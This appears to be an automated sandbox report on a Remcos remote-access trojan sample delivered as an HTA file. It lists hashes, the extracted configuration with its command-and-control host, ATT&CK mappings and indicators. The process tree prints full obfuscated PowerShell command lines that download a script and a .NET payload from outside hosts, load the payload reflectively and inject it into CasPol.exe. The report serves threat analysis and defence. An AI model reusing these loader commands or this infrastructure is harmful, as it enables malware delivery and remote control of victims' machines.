remcos | aea9253a5f1a4e0f59325f84c015b3980a1573e1873643fce09e084a76e0047b

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14-11-2024 02:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aea9253a5f1a4e0f59325f84c015b3980a1573e1873643fce09e084a76e0047b.hta
Size

207KB
MD5

c68d7836e2c6c8a7a4a633990cae450a
SHA1

5539d4f53c0606ce688636221c440b4b53c23ed6
SHA256

aea9253a5f1a4e0f59325f84c015b3980a1573e1873643fce09e084a76e0047b
SHA512

3b8b93c533a300b96df1c6c487cdead1ab42e859ffe5f8c1aa56236fcad9c553d79c46fd5cc6ee9a32523dec9c6e701d20961616646ba61e3c2239e415c875d0
SSDEEP

96:43F97gqxE+VV7TEFVVHGRQKjfJIPEKswcE0EBeEVVjEKQ:43F15xTV7TwVHGRJjkhclBSVjvQ

Score

10^/10

remcos remotehost defense_evasion discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

remcos

Botnet

RemoteHost

shlobo.duckdns.org:6946

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-MTESOL
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
Blocklisted process makes network request 3 IoCs

Processes:

PoweRsHELl.Exepowershell.exe

flow pid process

17 1600 PoweRsHELl.Exe
22 1920 powershell.exe
27 1920 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1056 powershell.exe
1920 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

PoweRsHELl.Exepowershell.exe

pid process

1600 PoweRsHELl.Exe
4144 powershell.exe

flow	pid	process
17	1600	PoweRsHELl.Exe
22	1920	powershell.exe
27	1920	powershell.exe

pid	process
1056	powershell.exe
1920	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1920 set thread context of 4780 1920 powershell.exe CasPol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 1920 set thread context of 4780	1920	powershell.exe	CasPol.exe

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

CasPol.exePoweRsHELl.Exepowershell.execvtres.exepowershell.exemshta.execsc.exeWScript.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoweRsHELl.Exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

Processes:

PoweRsHELl.Exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings PoweRsHELl.Exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	PoweRsHELl.Exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

PoweRsHELl.Exepowershell.exepowershell.exepowershell.exe

pid	process
1600	PoweRsHELl.Exe
1600	PoweRsHELl.Exe
4144	powershell.exe
4144	powershell.exe
1056	powershell.exe
1056	powershell.exe
1920	powershell.exe
1920	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

PoweRsHELl.Exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1600	PoweRsHELl.Exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	1920	powershell.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

mshta.exePoweRsHELl.Execsc.exeWScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2524 wrote to memory of 1600	2524	mshta.exe	PoweRsHELl.Exe
PID 2524 wrote to memory of 1600	2524	mshta.exe	PoweRsHELl.Exe
PID 2524 wrote to memory of 1600	2524	mshta.exe	PoweRsHELl.Exe
PID 1600 wrote to memory of 4144	1600	PoweRsHELl.Exe	powershell.exe
PID 1600 wrote to memory of 4144	1600	PoweRsHELl.Exe	powershell.exe
PID 1600 wrote to memory of 4144	1600	PoweRsHELl.Exe	powershell.exe
PID 1600 wrote to memory of 2436	1600	PoweRsHELl.Exe	csc.exe
PID 1600 wrote to memory of 2436	1600	PoweRsHELl.Exe	csc.exe
PID 1600 wrote to memory of 2436	1600	PoweRsHELl.Exe	csc.exe
PID 2436 wrote to memory of 2204	2436	csc.exe	cvtres.exe
PID 2436 wrote to memory of 2204	2436	csc.exe	cvtres.exe
PID 2436 wrote to memory of 2204	2436	csc.exe	cvtres.exe
PID 1600 wrote to memory of 4440	1600	PoweRsHELl.Exe	WScript.exe
PID 1600 wrote to memory of 4440	1600	PoweRsHELl.Exe	WScript.exe
PID 1600 wrote to memory of 4440	1600	PoweRsHELl.Exe	WScript.exe
PID 4440 wrote to memory of 1056	4440	WScript.exe	powershell.exe
PID 4440 wrote to memory of 1056	4440	WScript.exe	powershell.exe
PID 4440 wrote to memory of 1056	4440	WScript.exe	powershell.exe
PID 1056 wrote to memory of 1920	1056	powershell.exe	powershell.exe
PID 1056 wrote to memory of 1920	1056	powershell.exe	powershell.exe
PID 1056 wrote to memory of 1920	1056	powershell.exe	powershell.exe
PID 1920 wrote to memory of 4780	1920	powershell.exe	CasPol.exe
PID 1920 wrote to memory of 4780	1920	powershell.exe	CasPol.exe
PID 1920 wrote to memory of 4780	1920	powershell.exe	CasPol.exe
PID 1920 wrote to memory of 4780	1920	powershell.exe	CasPol.exe
PID 1920 wrote to memory of 4780	1920	powershell.exe	CasPol.exe
PID 1920 wrote to memory of 4780	1920	powershell.exe	CasPol.exe
PID 1920 wrote to memory of 4780	1920	powershell.exe	CasPol.exe
PID 1920 wrote to memory of 4780	1920	powershell.exe	CasPol.exe
PID 1920 wrote to memory of 4780	1920	powershell.exe	CasPol.exe
PID 1920 wrote to memory of 4780	1920	powershell.exe	CasPol.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\aea9253a5f1a4e0f59325f84c015b3980a1573e1873643fce09e084a76e0047b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe
  "C:\Windows\sYStEm32\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe" "pOwerSHeLl.ExE -ex BYPasS -NOp -w 1 -c dEVIcECreDentIAldEplOYmEnT ; iex($(IEx('[sYSTEm.teXt.eNCoDING]'+[cHar]58+[ChaR]0X3a+'UTf8.getsTRiNg([sySTem.COnVERt]'+[CHaR]0X3a+[chAr]0X3A+'frombaSE64STrIng('+[chAR]0x22+'JFNyRkRDMnFKTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iRXJkRWZJbmlUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1vbi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBob0xpVWhiSW9ELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVXSyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZGhzbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3dUxwdSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInNQUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNyRkRDMnFKTTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yOS82Ni9zZWVteWJlc3RnaXJsdGhpbmtpbmdzaGVpc2Fob3RjaGlja2J1dGZ1dmsudElGIiwiJEVuVjpBUFBEQVRBXHNlZW15YmVzdGdpcmx0aGlua2luZ3NoZWlzYWhvdGNoaWNrYnV0ZnUudmJTIiwwLDApO1N0YXJULXNMZUVwKDMpO3N0YXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3RnaXJsdGhpbmtpbmdzaGVpc2Fob3RjaGlja2J1dGZ1LnZiUyI='+[cHaR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1600
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPasS -NOp -w 1 -c dEVIcECreDentIAldEplOYmEnT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4144
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lwdcmd4d\lwdcmd4d.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4C7.tmp" "c:\Users\Admin\AppData\Local\Temp\lwdcmd4d\CSC786D0E859D7C4969B4774114A389FBB0.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2204
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestgirlthinkingsheisahotchickbutfu.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4440
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdMRVJpbWFnZScrJ1VybCA9ICcrJ0RqWmh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrJysnZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYnKycyYycrJzE3MzA5NDUxNzZhMDkwNGYgRGpaO0xFUndlYkNsJysnaScrJ2VudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7TEVSaW1hZ2VCeXRlcyAnKyc9IExFUndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoTEVSaW1hZ2UnKydVcmwpO0xFUmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKExFJysnUmltYWcnKydlQnl0JysnZXMpO0xFUnN0YXJ0RmxhZyA9IERqWjw8QkEnKydTRTY0X1NUQVJUPj5Ealo7TEVSZW5kRmxhZyA9IERqWjw8QkFTRTY0X0VORD4+RGpaO0xFUnN0YXJ0SW5kZXggPSBMRVJpbWFnZVRleHQuSW5kZXhPZihMRVJzdGFydEZsYWcpO0xFUmVuZEluZGV4ID0gTEVSaW1hZ2VUZXh0LkluZGV4T2YoTEVSZW5kRicrJ2xhZyk7TEVSc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIExFUmVuZEluZGV4IC1ndCBMRVJzdGFydEluZGV4O0xFUnN0YXJ0SW5kZXggKz0gTEVSc3RhcicrJ3RGbGFnLkxlbmd0aDtMRVJiYXNlNjRMZW5ndGggPSBMRVJlbmRJbmRleCAtIExFUnN0YXJ0SW5kZXg7TEVSYmFzZTY0Q29tbWFuZCA9JysnIExFUmltYWdlVGV4dC5TdWJzdHJpbmcoTEVSc3RhcnRJbmRleCwgTEVSYmEnKydzZTY0TGVuZ3RoKTtMRVJiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChMRVJiYXNlNjRDb20nKydtYW5kLlRvQ2hhckFycmF5KCkgaTFCIEZvckVhY2gtT2JqZWN0IHsgTEVSXyB9KVstMS4uLShMRVJiYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO0wnKydFUmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoTEVSYmFzZTY0UmV2ZXJzZWQpO0xFUmxvYWRlZEFzcycrJ2VtYmx5ID0gW1N5c3RlbS5SZWYnKydsZWN0JysnaW8nKyduLkFzc2VtYmx5XTo6TCcrJ29hZChMRVJjb21tYW5kQicrJ3l0ZXMpO0xFUnZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy4nKydIb21lXS5HZXRNZXRob2QoRGpaVkFJRGpaKTtMRVJ2YWlNZXRob2QuSW52b2tlKExFUm51bGwsIEAoRGpadHh0LlJSRlRSV1MvNjYvOTIuMDIyLjMuMjkxLy86cHR0aERqWiwgRGpaZGVzYXRpdmFkb0RqWiwgRGpaZGVzYXRpdicrJ2EnKydkJysnb0RqWiwgRGpaZGVzYScrJ3RpdmFkb0RqWiwgRGpaQ2FzUG9sRGpaLCBEalpkZXNhdGl2YWRvRGpaLCBEalpkZXNhdGl2YWRvRGpaLERqWmRlc2F0aXZhZG9EalosRGpaZGUnKydzYXRpdmFkb0RqWixEalpkZXNhdGl2YWRvJysnRCcrJ2paLERqWmRlc2F0aXZhZG9EalosRGpaZGVzYXRpdmFkJysnb0RqWixEaloxRGpaLERqWmRlc2F0aXYnKydhZG9EalopKTsnKS5yZVBMQWNFKChbY0hBUl02OCtbY0hBUl0xMDYrW2NIQVJdOTApLFtTdHJpbmddW2NIQVJdMzkpLnJlUExBY0UoKFtjSEFSXTc2K1tjSEFSXTY5K1tjSEFSXTgyKSxbU3RyaW5nXVtjSEFSXTM2KS5yZVBMQWNFKCdpMUInLCd8JykgfCAmICggJHNIRWxsaURbMV0rJHNIRWxMSURbMTNdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1056
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('LERimage'+'Url = '+'DjZhttps://1017.filemail.com/api/file/get?filek'+'ey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c6'+'2c'+'1730945176a0904f DjZ;LERwebCl'+'i'+'ent = New-Object System.Net.WebClient;LERimageBytes '+'= LERwebClient.DownloadDa'+'ta(LERimage'+'Url);LERimageText = [System.Text.Encoding]::UTF8.GetString(LE'+'Rimag'+'eByt'+'es);LERstartFlag = DjZ<<BA'+'SE64_START>>DjZ;LERendFlag = DjZ<<BASE64_END>>DjZ;LERstartIndex = LERimageText.IndexOf(LERstartFlag);LERendIndex = LERimageText.IndexOf(LERendF'+'lag);LERstartIndex -ge 0 -an'+'d LERendIndex -gt LERstartIndex;LERstartIndex += LERstar'+'tFlag.Length;LERbase64Length = LERendIndex - LERstartIndex;LERbase64Command ='+' LERimageText.Substring(LERstartIndex, LERba'+'se64Length);LERbase64Reversed = -join (LERbase64Com'+'mand.ToCharArray() i1B ForEach-Object { LER_ })[-1..-(LERbase64C'+'ommand.Length)];L'+'ERcommandBytes = [System.Convert]::FromBase64String(LERbase64Reversed);LERloadedAss'+'embly = [System.Ref'+'lect'+'io'+'n.Assembly]::L'+'oad(LERcommandB'+'ytes);LERvaiMethod '+'= [dnlib.IO.'+'Home].GetMethod(DjZVAIDjZ);LERvaiMethod.Invoke(LERnull, @(DjZtxt.RRFTRWS/66/92.022.3.291//:ptthDjZ, DjZdesativadoDjZ, DjZdesativ'+'a'+'d'+'oDjZ, DjZdesa'+'tivadoDjZ, DjZCasPolDjZ, DjZdesativadoDjZ, DjZdesativadoDjZ,DjZdesativadoDjZ,DjZde'+'sativadoDjZ,DjZdesativado'+'D'+'jZ,DjZdesativadoDjZ,DjZdesativad'+'oDjZ,DjZ1DjZ,DjZdesativ'+'adoDjZ));').rePLAcE(([cHAR]68+[cHAR]106+[cHAR]90),[String][cHAR]39).rePLAcE(([cHAR]76+[cHAR]69+[cHAR]82),[String][cHAR]36).rePLAcE('i1B','|') | & ( $sHElliD[1]+$sHElLID[13]+'x')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1920
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoweRsHELl.Exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
5a9b2636a929f4410982e6666a3bc78a

SHA1
e0117e160eef67584af41dc6a97d37bca4b4a69e

SHA256
0e24bbd8a8be2a821b176b584df04ac02f09e98100c36365013b3c58296a7964

SHA512
cd5a7eef0857ee9f54794bbdfdb9cf3bf874dc88608a803222cfe4b9e9e7b0868ee7abd8a633f85fd720a34405268217ebd0ff4dbacb4b319cf03cf2d90a117c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
04db3dc7bbffbe1e77ddbffde9a27472

SHA1
363e8670b511b9dff91aea41d9b19b84ca7cb700

SHA256
e1df95e1176d0d72f82e48db7b04387a27ce0b811ee1e546dc8715ff5f969595

SHA512
d3c4645a662ca13d00be58da01adb9ce93de2431430fc682869e42f3f39792989e1adcdac65db357c51f0dd4a4b3a510fb8cd34e1d1555fb677acce50e0f517d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC4C7.tmp

Filesize
1KB

MD5
3b9095c30ffeada29bf4b8d2d1f4c543

SHA1
ca0e04cb41384a2f55b3bbc47b5ff099d1dfb4e8

SHA256
a352edc63b5ba234b6e0159642341b0395046731dc8e48ae5826dec579d082df

SHA512
b59e42ee05fcbf18c1eb46c5055e64a437622b8373cee715169bdc9131fcd5048cb69d9b6d319a67a5c2fbbdaee7cda630e5ab93ff9630fcf151df9db0b153be

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rrs3yxg4.ggp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lwdcmd4d\lwdcmd4d.dll

Filesize
3KB

MD5
e6b10d526ff6b8e2a957ff0403a0005b

SHA1
5d7c68a02ea359653c7257700549950a85c03c72

SHA256
767220905220ec91aef3aa2a2efe37dbe2fbb54ad78b65b00936bd0dcaefa14e

SHA512
303859be68af2d020b763525de0247492faa055c2556bf444c1c3ec27a681109deb690c924d83fb216f309a65c83aacf3832f7e1a3cf42a4542b6a289b06b3bf

Download Submit
C:\Users\Admin\AppData\Roaming\seemybestgirlthinkingsheisahotchickbutfu.vbS

Filesize
137KB

MD5
b93e8a9bf23aeb31964d63d631ccf365

SHA1
05b27d7f62b142a9d88c6ab89eb8ffc5f2299bd4

SHA256
75a49d9f596717af29acad09533ed873c76d71ef857aa340e47a5605b209e63f

SHA512
46e5f392f462c69158443e1c26361e950452744240638375af4e3926f0b57eb2d0f58fea63a42f998e7da1776ee49cc993d67cc32c2b2aa5244476bc95654062

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lwdcmd4d\CSC786D0E859D7C4969B4774114A389FBB0.TMP

Filesize
652B

MD5
5546b6425434dd99c5cf20e78f40ad9f

SHA1
f09e0f09923cb187627aae6334733f2d8a5f3279

SHA256
68f648002a4b7f3b9d187b7ec15ead2cbe9f67f047e5b57a2943e6b30f012e92

SHA512
d487a7e08924fb0745340c6a270200a236f591a8f8990d5f7be0eaa0011124d4996bd350cd70e5f14d37b07d245cb7bc8d614b03bed20d71c971c21d797cf85d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lwdcmd4d\lwdcmd4d.0.cs

Filesize
466B

MD5
70e878f483525e691692b50ba3aeadd0

SHA1
fa16b13bc12663af3d9a7e7dba4e027931cf9ccb

SHA256
3de2628d310015c0692133b3509877416f0c20159830c0d9ad45f10109f0bee8

SHA512
22cb839c634a7c5dc2c4b00c7c98aaa12bc4c3cc76a096e52004ede5b8f2b79e71670702f4a028b55bf2f411501dff4347cc1947fc345b32c8d957c2d9a31a05

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lwdcmd4d\lwdcmd4d.cmdline

Filesize
369B

MD5
fb54978ab58b2ce7433d77c12922be0a

SHA1
d4508394bf8e16fc2ff601c8b9441c99de8c16c9

SHA256
de6174be81732adfb6a2a9622e614297f5f6a4bfb1f3ea0e446cacaade6c4097

SHA512
ab6a2dca70f0987bbe2dce94ce04da934bf4535775064fd8aecf36f36efcb7ce1d224779d47c3c94ccff8c5e53e77c523d99dbd146c31c23b3dab0884ef974c8

Download Submit
memory/1056-91-0x00000000063F0000-0x0000000006744000-memory.dmp

Filesize
3.3MB

Download
memory/1600-65-0x00000000062C0000-0x00000000062C8000-memory.dmp

Filesize
32KB

Download
memory/1600-73-0x00000000070E0000-0x0000000007102000-memory.dmp

Filesize
136KB

Download
memory/1600-0-0x0000000070E6E000-0x0000000070E6F000-memory.dmp

Filesize
4KB

Download
memory/1600-1-0x00000000023F0000-0x0000000002426000-memory.dmp

Filesize
216KB

Download
memory/1600-81-0x0000000070E60000-0x0000000071610000-memory.dmp

Filesize
7.7MB

Download
memory/1600-3-0x0000000070E60000-0x0000000071610000-memory.dmp

Filesize
7.7MB

Download
memory/1600-2-0x0000000005000000-0x0000000005628000-memory.dmp

Filesize
6.2MB

Download
memory/1600-4-0x0000000070E60000-0x0000000071610000-memory.dmp

Filesize
7.7MB

Download
memory/1600-74-0x00000000081D0000-0x0000000008774000-memory.dmp

Filesize
5.6MB

Download
memory/1600-72-0x0000000070E60000-0x0000000071610000-memory.dmp

Filesize
7.7MB

Download
memory/1600-71-0x0000000070E6E000-0x0000000070E6F000-memory.dmp

Filesize
4KB

Download
memory/1600-5-0x0000000004F50000-0x0000000004F72000-memory.dmp

Filesize
136KB

Download
memory/1600-6-0x00000000056A0000-0x0000000005706000-memory.dmp

Filesize
408KB

Download
memory/1600-7-0x0000000005710000-0x0000000005776000-memory.dmp

Filesize
408KB

Download
memory/1600-19-0x0000000005D50000-0x0000000005D9C000-memory.dmp

Filesize
304KB

Download
memory/1600-18-0x0000000005D20000-0x0000000005D3E000-memory.dmp

Filesize
120KB

Download
memory/1600-13-0x0000000005780000-0x0000000005AD4000-memory.dmp

Filesize
3.3MB

Download
memory/1920-102-0x00000000073A0000-0x00000000074F8000-memory.dmp

Filesize
1.3MB

Download
memory/1920-103-0x0000000007500000-0x000000000759C000-memory.dmp

Filesize
624KB

Download
memory/4144-45-0x0000000007D80000-0x0000000007E16000-memory.dmp

Filesize
600KB

Download
memory/4144-47-0x0000000007D20000-0x0000000007D2E000-memory.dmp

Filesize
56KB

Download
memory/4144-46-0x0000000007CF0000-0x0000000007D01000-memory.dmp

Filesize
68KB

Download
memory/4144-29-0x0000000006D80000-0x0000000006DB2000-memory.dmp

Filesize
200KB

Download
memory/4144-50-0x0000000007D70000-0x0000000007D78000-memory.dmp

Filesize
32KB

Download
memory/4144-44-0x0000000007B50000-0x0000000007B5A000-memory.dmp

Filesize
40KB

Download
memory/4144-43-0x0000000007A30000-0x0000000007A4A000-memory.dmp

Filesize
104KB

Download
memory/4144-42-0x0000000008190000-0x000000000880A000-memory.dmp

Filesize
6.5MB

Download
memory/4144-41-0x0000000007A60000-0x0000000007B03000-memory.dmp

Filesize
652KB

Download
memory/4144-40-0x0000000006DC0000-0x0000000006DDE000-memory.dmp

Filesize
120KB

Download
memory/4144-48-0x0000000007D30000-0x0000000007D44000-memory.dmp

Filesize
80KB

Download
memory/4144-49-0x0000000007E40000-0x0000000007E5A000-memory.dmp

Filesize
104KB

Download
memory/4144-30-0x000000006D720000-0x000000006D76C000-memory.dmp

Filesize
304KB

Download
memory/4780-116-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
